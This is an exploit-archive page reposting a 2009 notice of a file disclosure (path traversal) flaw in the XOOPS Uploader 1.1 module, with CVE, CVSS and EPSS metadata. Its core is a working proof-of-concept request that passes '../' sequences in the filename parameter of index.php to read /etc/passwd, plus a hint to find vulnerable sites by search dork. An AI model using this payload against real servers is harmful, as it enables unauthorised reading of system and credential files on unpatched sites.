Advertisement






XOOPS Module Uploader 1.1 (filename) File Disclosure Vulnerability

CVE Category Price Severity
CVE-2006-3023 CWE-22 $500 High
Author Risk Exploitation Type Date
K-159 High Remote 2009-09-12
CVSS EPSS EPSSP
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N 0.02471 0.62892

CVSS vector description

Our sensors found this exploit at: http://cxsecurity.com/ascii/WLB-2009090112

Below is a copy:

                                        MMM                                 MMM       
                                        MMM                                 MMM       
MMMMMMMMMMMMM    MMMMMMMMM  MMMMMMMMMM  MMMMMMMMM    MMMMMMMMM   MMMMMMMMM  MMMMMMMMM 
MM   MMM   MMM   MM         MMM         MMM    MMM  MMM    MMM  MMM    MMM  MMM    MMM
MM   MMM   MMM   MMMMMMM    MMMMMMMM    MMM    MMM  MMM    MMM  MMM    MMM  MMM    MMM
MM   MMM   MMM   MMMMMMM    MMMMMMMM    MMM MMMMM   MMMMMMMMMM  MMMMMMMMMM  MMM    MMM
MM   MMM   MMM   MM         MMM         MMM  MMMN   MMM    MMM  MMM    MMM  MMM    MMM
MM   MMM   MMM   MMMMMMMMM  MMMMMMMMMM  MMM   NMM   MMM    MMM  MMM    MMM  MMM    MMM


[*] Vulnerable : XOOPS Module Uploader 1.1 - Local File Inclusion
                 Module url : http://www.xoops.org/modules/repository/singlefile.php?cid=28&lid=1243

[*] Author     :  MEEKAAH

[*] Dork       :  Find it yourself ;)

[*] POC        :  http://localhost/modules/uploader/index.php?action=downloadfile&filename=[LFI]

[*] Example    :  http://localhost/modules/uploader/index.php?action=downloadfile&filename=../../../../../../../../../../../../../../../../etc/passwd

-----------------------------------------------------------------------------------------------------------

[*] Greetings  :  Alex, Adeel, CeBbZ, Cubacola, Noel ...



Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.